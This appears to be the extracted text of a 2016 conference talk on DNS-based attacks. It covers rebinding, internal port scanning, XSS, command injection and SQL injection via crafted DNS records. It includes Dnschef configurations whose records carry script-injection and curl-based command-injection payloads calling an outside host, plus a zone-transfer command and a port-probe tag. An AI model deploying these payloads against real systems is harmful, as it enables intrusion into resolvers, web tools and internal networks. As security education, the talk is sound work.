This document discusses various DNS-based attacks such as DNS rebinding, DNS hijacking, DNS cache poisoning, and DNS flooding. It provides examples of using the Dnschef tool to manipulate DNS records to conduct cross-site scripting (XSS), remote code execution (RCE), and SQL injection attacks by encoding malicious payloads in DNS responses. The document also covers DNS concepts like the same-origin policy and how attackers can bypass it using techniques like DNS port scanning and DNS record forging.

1. 2016

2. DNS
and attacks

3. What is DNS?
The Domain Name System (DNS) is a
hierarchical decentralized naming system for
computers, services, or any resource
connected to the Internet or a private network.
It associates various information with domain
names assigned to each of the participating
entities. Most prominently, it translates more
readily memorized domain names to the
numerical IP addresses needed for the
purpose of locating and identifying computer
services and devices with the underlying
network protocols. By providing a worldwide,
distributed directory service, the Domain Name
System is an essential component of the
functionality of the Internet.

4. 213.180.204.3 mycomputer.arpa
173.194.32.169 dennis.arpa
87.240.165.87 newoffice.arpa
173.252.89.132 test1122
10.28.114.254 it.chat.in-addr.arpa
Hosts.txt

5. A
KEY
DS
AAAA
DNSKEY
CNAME
MXNS PTR
SOA
TSIG
SRV
TXT

6. DNS
and DDoS

7. dig -t axfr sitename.com

8. http://half-life.wikia.com/wiki/Half-Life_2_Beta
http://pixelsmashers.com/wordpress/?p=7866

10. DNS
and SOP

11. What is SOP?
In computing, the same-origin policy is an
important concept in the web application
security model. Under the policy, a web
browser permits scripts contained in a first
web page to access data in a second web
page, but only if both web pages have the
same origin. An origin is defined as a
combination of URI scheme, hostname,
and port number. This policy prevents a
malicious script on one page from
obtaining access to sensitive data on
another web page through that page's
Document Object Model.

12. Same-origin policy

13. A 97.246.251.93
A 192.168.0.1
evil.xxx:

14. https://crypto.stanford.edu/dns/dns-rebinding.pdf
https://www.ptsecurity.com/download/DNS-rebinding.pdf
The resulting attack consists of the following steps:
1. The victim addresses the dns.evil.xxx domain.
2. The attacker’s DNS server returns both IP addresses in the fixed order.
3. The browser redirects the request to the server at the external 97.246.251.93 IP address.
4. The server returns an HTML page containing JavaScript.
5. After the browser downloads the page, the client’s JavaScript sends a request to the dns.evil.xxx domain.
6. After the request is received, the server script blocks the incoming connections with the victim’s IP address.
7. After a while, the client’s script re-addresses the dns.attacker.ru domain. Since the server returns RTS from the
97.246.251.93 IP address, the request is redirected to the local server at 192.168.0.1.
Now the JavaScript is able to send any GET/POST/HEAD requests to an application at 97.246.251.93, as well as
process the received responses and send the results to the attacker..

15. DNS
and ports

16. A 1.2.3.4
A 4.3.2.1
A 192.168.1.1
evil.xxx:
?

17. test.evil.xxx 192.168.1.1
test.evil.xxx report1.host
test2.evil.xxx 192.168.1.2
test2.evil.xxx report2.host
test3.evil.xxx 192.168.1.3
test3.evil.xxx report3.host
test4.evil.xxx 192.168.1.4
test4.evil.xxx report4.host
cat /etc/hosts
?

18. test.evil.xxx 192.168.1.1
test.evil.xxx report1.host
test2.evil.xxx 192.168.1.2
test2.evil.xxx report2.host
test3.evil.xxx 192.168.1.3
test3.evil.xxx report3.host
test4.evil.xxx 192.168.1.4
test4.evil.xxx report4.host
cat /etc/hosts
192.168.1.3:3306 - open port
create page:
<img src=”http://test.evil.xxx:3306”>

19. test.evil.xxx 192.168.1.1
test.evil.xxx report1.host
test2.evil.xxx 192.168.1.2
test2.evil.xxx report2.host
test3.evil.xxx 192.168.1.3
test3.evil.xxx report3.host
test4.evil.xxx 192.168.1.4
test4.evil.xxx report4.host
cat /etc/hosts
test.evil.xxx (192.168.1.1) err
test.evil.xxx (report1.host) ok, redirect
test2.evil.xxx (192.168.1.2) err
test2.evil.xxx (report2.host) ok, redirect
test3.evil.xxx (192.168.1.2) ok!
test3.evil.xxx report3.host

20. DNS
and DoS

21. ns.hack.bo0om.ru. 0 IN NS
ns.hack.bo0om.ru.

23. DNS
and XSS

24. https://news.ycombinator.com/item?id=8336025
http://www.serveradminblog.com/2014/09/xss-via-dns/

26. Dnschef
[NS] # Queries for mail server records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?ns></script>
[MX] # Queries for mail server records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>
[CNAME] # Queries for alias records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>
http://thesprawl.org/projects/dnschef/

32. DNS
and RCE

33. RCE vectors
& whoami
`whoami`
$(whoami)
‘&whoami
“&whoami
With $IFS set to default, a blank line displays

34. Dnschef
[NS] # Queries for mail server records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl
https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
[MX] # Queries for mail server records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl
https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
[CNAME] # Queries for alias records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl
https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'

37. DNS
and SQLinj

38. DNS
and SQLinj, OOB

39. DNS
and SQLinj, OOB, DNS
hijacking, DNS cache
poisoning, DNS flood...

40. Anton “Bo0oM” Lopanitsyn
https://bo0om.ru
@i_bo0om
Questions?